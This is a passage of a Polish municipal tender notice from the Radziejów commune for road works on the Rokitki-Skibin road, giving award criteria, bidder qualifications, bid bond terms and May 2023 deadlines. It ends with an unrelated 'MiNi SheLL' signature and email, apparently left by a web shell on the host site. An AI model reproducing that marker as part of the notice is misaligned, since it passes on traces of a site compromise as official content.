kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III – Droga nr 180407 C Rokitki-Skibin w miejscowości Skibin od km 0+440,00 do km 0+772,80 na długości 332,80 mb<br/>W zakres zamierzenia budowlanego wchodzi:<br/>- wykonanie rozbiórek istniejących elementów drogowych – konstrukcji istniejącej jezdni, <br/>- wykonanie robót ziemnych,<br/>- wykonanie nowych warstw konstrukcyjnych - podbudowy,<br/>- wykonanie podwójnego powierzchniowego utrwalenia grysami bazaltowymi na emulsji modyfikowanej,<br/>- wykonanie poboczy,<br/>- wykonanie stałej organizacji ruchu – wg. odrębnego opracowania branżowego,<br/>- uporządkowanie terenu po robotach budowlanych.<br/>Przyjęto następujące założenia projektowe:<br/>- klasa ulicy D,<br/>- prędkość projektowa 30 km/h <br/>- szerokość jezdni 3,5 m<br/>- pobocza szerokości 0,75 m<br/>Konstrukcja nawierzchni jezdni:<br/>- Podwójne powierzchniowe utrwalenia grysami bazaltowy 5/8, 8/11 na emulsji modyfikowanej,<br/>- Górna warstwa podbudowy z kruszywa łamanego (KŁSM) 0/31,5 gr. 8 cm (sienit)<br/>- Dolna warstwa podbudowy z kruszywa łamanego KŁSM 0/63,0 gr. 12 cm (sienit)<br/>- Warstwa odcinająca z piasku gr. 10 cm<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 32 cm<br/>Konstrukcja nawierzchni poboczy:<br/>- Nawierzchni z kruszywa łamanego (KŁSM) 0/31,5 gr. 12 cm (sienit)<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 12 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">44113810-6 - Wykończenia nawierzchni</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nieodrzuconych na podstawie kryteriów oceny ofert określonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>z postępowania oraz spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie;<br/>2)	kompetencji lub uprawnień do prowadzenia określonej działalności, o ile to wynika z odrębnych przepisów;<br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie;<br/>3)	sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie;<br/>4)	zdolności technicznej lub zawodowej;<br/>Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt 4, Zamawiający wymaga, aby Wykonawca wykazał, że:<br/>a)	posiada doświadczenie polegające na wykonaniu co najmniej jednej roboty budowlanej w branży drogowej związanej z remontem, budową, rozbudową lub przebudową dróg o nawierzchni bitumicznej o wartości nie mniejszej niż 900.000 zł brutto, – w przypadku składania oferty na całość zadania, oraz nie mniejszej niż 300.000,00 zł brutto – w przypadku składania oferty na poszczególne części zadania wykonanej nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Wykonawca winien wskazać rodzaj roboty, jej wartość, datę i miejsce wykonania oraz podmiot, na rzecz którego robota ta została wykonana. Wymagane jest załączenie dowodu określającego, czy ta robota budowlana została wykonana należycie, w szczególności informacji o tym, czy robota została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona,<br/>b) dysponuje lub będzie dysponował co najmniej jednym kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności drogowej bez ograniczeń z minimum 3-letnim doświadczeniem lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U z 2021 r. poz. 2351 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający żąda w celu<br/>potwierdzenia przez Wykonawcę braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086),<br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 3 do SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w postępowaniu dotyczących:<br/>1) zdolności technicznej lub zawodowej:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane zgodnie z załącznikiem nr 6 do SWZ, oraz załączenie dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów - inne odpowiednie dokumenty;<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji niniejszego zamówienia publicznego, o których mowa w Rozdziale<br/>XXI ust. 1 pkt 4) lit. b) i c), wraz z informacjami na temat ich uprawnień i doświadczenia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania w zakresie wskazanym przez Zamawiającego – zgodnie z Załącznikiem Nr 2 do SWZ,<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wielu wykonawców, oświadczenie składa każdy z wykonawców, oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>- w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca przedstawia także<br/>oświadczenie podmiotu udostępniającego zasoby potwierdzającego brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim wykonawca powołuje się na jego zasoby;<br/>2) dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>3) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy);<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy – zgodnie z Załącznikiem Nr 4 do<br/>SWZ (jeżeli dotyczy);<br/>5) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia (zgodnie z Załącznikiem Nr 5 do SWZ) lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów w<br/>przypadku polegania na zdolnościach innych podmiotów (jeżeli dotyczy).<br/>6) dokument potwierdzający wpłacenie lub wniesienie wadium (jeśli dotyczy).<br/>2. Każdy Wykonawca może złożyć tylko jedną ofertę. Złożenie większej liczby ofert spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.<br/>3. Wykonawca ponosi wszelkie koszty związane z przygotowaniem oferty, a Zamawiający nie przewiduje zwrotu kosztów<br/>udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>3. Wadium może być wnoszone wg wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r., poz. 299).<br/>4. Wykonawca złoży dokument w formie oryginału potwierdzającego wniesienie wadium w siedzibie Zamawiającego w<br/>Urzędzie Gminy Radziejów, 88-200 Radziejów ul. Kościuszki 20/22, pok. nr 203 (kasa) lub dołączy do oferty. Wadium w<br/>pieniądzu należy wnieść przelewem na konto Zamawiającego: BS Radziejów nr 40 9549 0001 0002 8756 2000 0001. Za<br/>termin wniesienia wadium w pieniądzu przyjmuje się datę i godzinę uznania na rachunku bankowym Zamawiającego, a nie<br/>datę wydania dyspozycji przelewu. Kopię przelewu poświadczoną za zgodność z oryginałem należy załączyć do oferty.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Stosowne pełnomocnictwo należy złożyć wraz z<br/>ofertą.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań dotyczących robót budowlanych.<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wielu Wykonawców, oświadczenie, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym przez Zamawiającego składa każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy<br/>określone zostały w projekcie umowy, stanowiącym załącznik Nr 8.1, 8.2, 8.3 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmian zawartej umowy w przypadkach, o których mowa w art. 455 ustawy oraz w<br/>przypadkach wskazanych w projekcie umowy, o którym mowa w ust. 1. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ugradziejow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający zaprosi do negocjacji (o ile zadecyduje o ich przeprowadzeniu) trzech wykonawców, których oferty nie<br/>podlegają odrzuceniu i uzyskają największą liczbę punktów w kryterium ceny.

Creat By MiNi SheLL
Email: jattceo@gmail.com